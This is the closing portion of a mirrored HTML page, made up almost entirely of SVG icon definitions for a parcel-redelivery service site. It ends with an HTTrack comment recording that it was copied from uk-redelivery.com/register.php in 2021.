    <path d="M7.2 9.847v20.427H.403V9.847h6.799zm.448-6.319c0 1.962-1.476 3.531-3.847 3.531h-.043C1.476 7.06 0 5.49 0 3.53 0 1.525 1.52 0 3.846 0s3.758 1.526 3.802 3.528zM31.72 18.562v11.712h-6.798V19.346c0-2.745-.984-4.618-3.445-4.618-1.879 0-2.997 1.263-3.489 2.482-.18.437-.224 1.046-.224 1.657v11.408h-6.8s.09-18.51 0-20.427h6.8v2.893c.903-1.39 2.519-3.373 6.128-3.373 4.474 0 7.828 2.92 7.828 9.194z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="loading" viewBox="0 0 67 67">
    <path d="M33.5 65C50.897 65 65 50.897 65 33.5a31.392 31.392 0 0 0-8.632-21.663C50.628 5.779 42.505 2 33.5 2 16.103 2 2 16.103 2 33.5" stroke="currentColor" stroke-width="4" fill="none" stroke-linecap="square"></path>
</symbol><symbol id="mail-services" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M3 6l9 7 9-7"></path>
        <path d="M3 6h18v12H3z"></path>
    </g>
</symbol><symbol id="minus" viewBox="0 0 12 12">
    <path d="M0 6h12" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="parking" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M2 19v-9h20v9H6zM4 9l2-6h12l2 6"></path>
        <circle fill="currentColor" cx="17.5" cy="14.5" r="1.5"></circle>
        <circle fill="currentColor" cx="6.5" cy="14.5" r="1.5"></circle>
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M5 20v1h2v-1m10 0v1h2v-1"></path>
    </g>
</symbol><symbol id="pay-a-fee" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd">
        <rect stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" x="3" y="7" width="24" height="16" rx="2"></rect>
        <circle fill="currentColor" cx="7.5" cy="18.5" r="1.5"></circle>
        <circle fill="currentColor" cx="11.5" cy="18.5" r="1.5"></circle>
        <path d="M3 12h24" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
    </g>
</symbol><symbol id="pencil" viewBox="0 0 24 24">
  <path d="M3.88 17.68L17.3 2.78l3.15 2.84-13.42 14.9-3.48.7.33-3.54z" stroke-linecap="round" fill="none" stroke="currentColor" stroke-linejoin="round" stroke-width="2"></path>
  <path d="M14.59 6.75l2.1 1.9" stroke-linecap="square" fill="none" stroke="currentColor" stroke-linejoin="round" stroke-width="2"></path>
</symbol><symbol id="person" viewBox="0 0 25 28">
    <g transform="translate(1.563 1.556)" stroke-width="2" stroke="currentColor" fill="none" fill-rule="evenodd">
        <ellipse cx="10.55" cy="7.676" rx="7.425" ry="7.676"></ellipse>
        <path d="M21.745 23.443c.886 2.489-22.65 2.414-21.718-.234 2.14-6.078 8.741-9.174 14.745-6.915 3.372 1.27 5.839 3.958 6.973 7.149z" stroke-linecap="round" stroke-linejoin="round"></path>
    </g>
</symbol><symbol id="phone" viewBox="0 0 30 30">
    <path d="M26.12 8.828c-.07.422-.126.847-.216 1.267a16.48 16.48 0 0 1-1.822 4.45 23.773 23.773 0 0 1-4.588 5.858c-2.248 2.069-4.724 3.79-7.604 4.875a9.895 9.895 0 0 1-3.253.715 3.916 3.916 0 0 1-2.994-1.073c-.663-.648-1.35-1.274-1.955-1.97-.925-1.077-.925-2.248.044-3.287a65.074 65.074 0 0 1 3.213-3.18 2.183 2.183 0 0 1 2.969 0c.617.543 1.178 1.145 1.767 1.718.049.053.092.108.179.204a16.73 16.73 0 0 0 6.576-6.596l-1.384-1.369a3.457 3.457 0 0 1-.925-1.233 2.069 2.069 0 0 1 .4-2.254 89.675 89.675 0 0 1 3.374-3.361 2.202 2.202 0 0 1 2.939-.059c.814.691 1.584 1.456 2.33 2.23.508.55.82 1.252.892 1.998.012.053.028.105.046.157l.012.91z" stroke="currentColor" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="plus" viewBox="0 0 12 12">
    <path d="M6 0v12M0 6h12" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="prepaid-item-or-return" viewBox="0 0 24 24">
    <path d="M3 9h18v12H3zm11 3h4m-4 3h2m0-13l1 1-1 1M8 6c1.333-2 4-3 8-3" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="printing" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M6 5V2h12v3M6 17H2V8h20v9h-4m-9-2h6"></path>
        <path d="M6 11v11h12V11zm3 7h6"></path>
    </g>
</symbol><symbol id="question-mark" viewBox="0 0 12 12">
    <path d="M8.628 3.576c0 1.162-.686 1.806-1.414 2.38-.91.714-.994.966-.994 1.442 0 .448-.35.798-.868.798S4.47 7.86 4.47 7.3c0-.84.196-1.302 1.078-1.988.658-.532 1.148-.854 1.148-1.526 0-.854-.574-1.134-1.204-1.134-.56 0-.868.21-1.162.42a.93.93 0 0 1-.448.126C3.308 3.198 3 2.778 3 2.4c0-.378.294-.7.616-.896.56-.322 1.148-.504 2.1-.504 1.344 0 2.912.742 2.912 2.576zm-2.044 6.65c0 .672-.546 1.218-1.232 1.218a1.219 1.219 0 0 1-1.218-1.218 1.225 1.225 0 1 1 2.45 0z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="question" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <circle stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" cx="12" cy="12" r="10"></circle>
        <path d="M14.628 9.576c0 1.162-.686 1.806-1.414 2.38-.91.714-.994.966-.994 1.442 0 .448-.35.798-.868.798s-.882-.336-.882-.896c0-.84.196-1.302 1.078-1.988.658-.532 1.148-.854 1.148-1.526 0-.854-.574-1.134-1.204-1.134-.56 0-.868.21-1.162.42a.93.93 0 0 1-.448.126C9.308 9.198 9 8.778 9 8.4c0-.378.294-.7.616-.896.56-.322 1.148-.504 2.1-.504 1.344 0 2.912.742 2.912 2.576zm-2.044 6.65c0 .672-.546 1.218-1.232 1.218a1.219 1.219 0 0 1-1.218-1.218 1.225 1.225 0 1 1 2.45 0z" fill="currentColor"></path>
    </g>
</symbol><symbol id="quote-mark" viewBox="0 0 49 44">
    <path d="M0 22.59L10.99 0H21l-6.28 22.196h5.495V44H0V22.59zm28 0L38.99 0H49l-6.28 22.196h5.495V44H28V22.59z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="redelivery" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M15 2C7.82 2 2 7.82 2 15a12.97 12.97 0 0 0 4.347 9.702c.466.416.962.798 1.484 1.144M15 1l1 1-1 1"></path>
        <circle cx="15" cy="15" r="8"></circle>
        <path d="M11 12l4 3h3m-3 12.846c7.18 0 13-5.82 13-13 0-3.856-1.68-7.32-4.347-9.702A13.054 13.054 0 0 0 22.169 4"></path>
        <path d="M16 29l-1-1 1-1"></path>
    </g>
</symbol><symbol id="restrictions" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M12.175 2L2 20h20z"></path>
        <path d="M13.198 9.08l-.224 4.004c-.028.597-.21.924-.756.924-.518 0-.7-.327-.742-.924l-.21-4.003c-.028-.583.308-1.081.952-1.081.658 0 1.008.498.98 1.08zm.252 7.16c0 .672-.546 1.218-1.232 1.218A1.219 1.219 0 0 1 11 16.24a1.225 1.225 0 1 1 2.45 0z" fill="currentColor"></path>
    </g>
</symbol><symbol id="return-an-item" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M15 2C7.82 2 2 7.82 2 15a12.97 12.97 0 0 0 4.347 9.702A12.951 12.951 0 0 0 15 28c7.18 0 13-5.82 13-13"></path>
        <path d="M8 10l7 6 7-6"></path>
        <path d="M8 20h14V10H8zm7-19l1 1-1 1"></path>
    </g>
</symbol><symbol id="safe-and-trusted" viewBox="0 0 30 38">
    <path d="M13 22l9-9m-9 9l-4-4m6-17L1 4.46v19.15C2.656 29.405 7.323 33.868 15 37m0-36l14 3.46v19.15C27.344 29.405 22.677 33.868 15 37" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="search" viewBox="0 0 25 26">
    <g transform="translate(-1 -1)" stroke="currentColor" stroke-width="2" fill="none">
        <ellipse cx="11.698" cy="11.902" rx="9.334" ry="9.569"></ellipse>
        <path d="M18.91 19.833l5.8 5.417" stroke-linecap="round"></path>
    </g>
</symbol><symbol id="services-near-you" viewBox="0 0 23 31">
    <path d="M11.5 1.966c-5.331 0-9.643 4.317-9.643 9.655 0 7.241 9.643 17.93 9.643 17.93s9.643-10.689 9.643-17.93c0-5.338-4.312-9.655-9.643-9.655zm0 13.103a3.447 3.447 0 0 1-3.444-3.448A3.447 3.447 0 0 1 11.5 8.172a3.447 3.447 0 0 1 3.444 3.449 3.447 3.447 0 0 1-3.444 3.448z" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="shares" viewBox="0 0 45 45">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor">
        <path stroke-width="3" d="M4.772 6v34h35"></path>
        <g stroke-width="2">
            <path d="M12.126 20.94l1.957 7.22 6.563-10.318L25.916 27l11.103-15.96.7-.667"></path>
            <path d="M32.736 9.61h5.711v5.712"></path>
        </g>
    </g>
</symbol><symbol id="sorry" viewBox="0 0 45 45">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" stroke="currentColor">
        <circle cx="22.5" cy="22.5" r="18.5"></circle>
        <g transform="translate(15 17)">
            <circle cx="2" cy="2" r="2"></circle>
            <circle cx="13" cy="2" r="2"></circle>
        </g>
        <path d="M32.202 30.159C29.755 27.592 26.344 26 22.57 26c-3.742 0-7.128 1.566-9.57 4.094"></path>
    </g>
</symbol><symbol id="special-dates" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd">
        <path d="M8 3v4" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <rect stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" x="4" y="5" width="22" height="22" rx="2"></rect>
        <path d="M5 10h20m-3-7v4" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <path d="M14.255 22.677a.95.95 0 0 1-.95.95h-4.71c-.575 0-.95-.388-.95-.95 0-1.584.706-2.549 1.627-3.34 1.325-1.182 2.996-1.844 2.996-3.198 0-.662-.375-1.339-1.354-1.339-.576 0-.95.144-1.282.331-.403.23-.619.475-.993.475a.943.943 0 0 1-.936-.936c0-.259.072-.518.345-.734.778-.62 1.772-.936 2.938-.936 2.362 0 3.269 1.7 3.269 3.14 0 3.023-3.643 3.484-4.45 5.6h3.5c.532 0 .95.419.95.937zm7.963-2.376c0 1.757-1.051 3.456-3.47 3.456-.879 0-1.67-.158-2.333-.59-.346-.23-.49-.548-.49-.85 0-.49.375-.95.893-.95a.94.94 0 0 1 .547.172c.245.173.75.461 1.383.461 1.094 0 1.483-.763 1.483-1.7 0-1.137-.576-1.598-1.238-1.598-.519 0-.807.188-1.08.39-.288.2-.447.374-.764.374-.532 0-.964-.375-.936-.98l.144-4.435a.971.971 0 0 1 .95-.921h3.5c.504 0 .922.432.922.95a.94.94 0 0 1-.922.936h-2.65l-.086 2.218c.346-.144.72-.216 1.094-.216 1.844 0 3.053 1.21 3.053 3.283z" fill="currentColor"></path>
    </g>
</symbol><symbol id="tag" viewBox="0 0 14 17">
    <path d="M9.708 2.3a.941.941 0 1 1 1.614.97.941.941 0 0 1-1.614-.97zM12.332.43a.623.623 0 0 0-.766-.451L6.909 1.225a.623.623 0 0 0-.373.28L.321 11.849a.623.623 0 0 0 .213.856l5.79 3.478a.623.623 0 0 0 .854-.213l6.247-10.397a.623.623 0 0 0 .071-.472L12.332.43z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="tick-circle" viewBox="0 0 69 69">
    <g fill="none" fill-rule="evenodd" stroke="currentColor" stroke-width="3" stroke-linecap="round" stroke-linejoin="round">
        <circle cx="34.5" cy="34.5" r="33"></circle>
        <path d="M21.5 36.77l7.09 7.09L47.5 25.14"></path>
    </g>
</symbol><symbol id="tick" viewBox="0 0 24 24">
    <path stroke="currentColor" stroke-width="2" d="M1 13.765l5.955 5.955L22.834 4" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="tip" viewBox="0 0 24 24">
    <g fill="none" stroke-width="2" stroke-linecap="round" stroke="currentColor">
        <circle cx="11.98" cy="11.52" r="6.7"></circle>
        <path d="M20.62 5.81l-.95.96M3.38 5.78l.95.96M9.12 18.22V21a2 2 0 0 0 2 2h1.73a2 2 0 0 0 2-2v-2.78"></path>
        <path d="M10.64 18.22l-.56-5.6a1 1 0 0 1 .9-1.09h1.91a1 1 0 0 1 1 1v.1l-.56 5.6M11.98 1v.96m4.79 19.13h-.96m-7.65 0H7.2"></path>
    </g>
</symbol><symbol id="track" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M26 15h4"></path>
        <circle cx="15" cy="15" r="11"></circle>
        <circle cx="15" cy="15" r="2"></circle>
        <path d="M0 15h4M15 0v4m0 22v4"></path>
    </g>
</symbol><symbol id="travel" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M3 8h18v12H3zm4-4h10v4H7z"></path>
        <path d="M6 9h1v2H6zm11 0h1v2h-1z"></path>
    </g>
</symbol><symbol id="twitter" viewBox="0 0 31 25">
    <path d="M27.348 3.952a6.32 6.32 0 0 0 2.795-3.49 12.786 12.786 0 0 1-4.04 1.531A6.362 6.362 0 0 0 21.463 0c-3.512 0-6.358 2.826-6.358 6.31 0 .495.053.977.162 1.438A18.1 18.1 0 0 1 2.158 1.154a6.258 6.258 0 0 0-.86 3.174 6.302 6.302 0 0 0 2.829 5.254 6.42 6.42 0 0 1-2.882-.789v.078c0 3.058 2.19 5.61 5.103 6.188a6.268 6.268 0 0 1-1.677.222c-.41 0-.81-.038-1.196-.112a6.356 6.356 0 0 0 5.941 4.382 12.823 12.823 0 0 1-7.898 2.7c-.514 0-1.021-.026-1.518-.086A18.114 18.114 0 0 0 9.75 25c11.7 0 18.093-9.616 18.093-17.956 0-.275-.004-.548-.016-.817A12.826 12.826 0 0 0 31 2.96c-1.14.502-2.367.842-3.652.993z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="uniform" viewBox="0 0 49 51">
    <path d="M11.013 46.328c-.01 1.574 4.557 2.36 13.7 2.36 8.754 0 13.13-.786 13.13-2.36-.112-1.56-.495-6.947-.836-12.355-.822-13.022-.607-13.474-.505-13.691l.027-.056.042-.046c.1-.11.23-.17.37-.17.447 0 .623.522.808 1.205.149.55.301 1.261.463 2.015.19.89.464 2.166.666 2.692.631-.262 2.09-.874 3.576-1.546 3.496-1.579 4.094-2.11 4.195-2.231l.02-.096.062-.049a.462.462 0 0 0 .03-.273L38.977 6.404c-2.713-1.37-6.598-3.313-7.796-3.87-.838 1.831-3.635 3.77-6.467 3.77-1.697 0-4.02-.675-5.59-3.837-1.367.44-6.705 2.527-8.796 3.733-.667 1.275-7.07 13.528-7.861 15.641.111.298 1.147 1.134 3.124 2.075 1.787.85 3.596 1.436 4.832 1.57.573-1.79 1.531-4.802 1.625-5.175a.418.418 0 0 1 .408-.324h.197l.125.15c.12.145.12.145.059 1.34-.034.653-.088 1.598-.157 2.731-.148 2.432-.348 5.5-.55 8.418-.236 3.44-.792 11.24-1.117 13.702z" stroke="currentColor" stroke-width="3" fill-rule="nonzero" fill="none"></path>
</symbol></svg></span>









</body>

<!-- Mirrored from uk-redelivery.com/register.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 26 Feb 2021 15:54:37 GMT -->
</html>
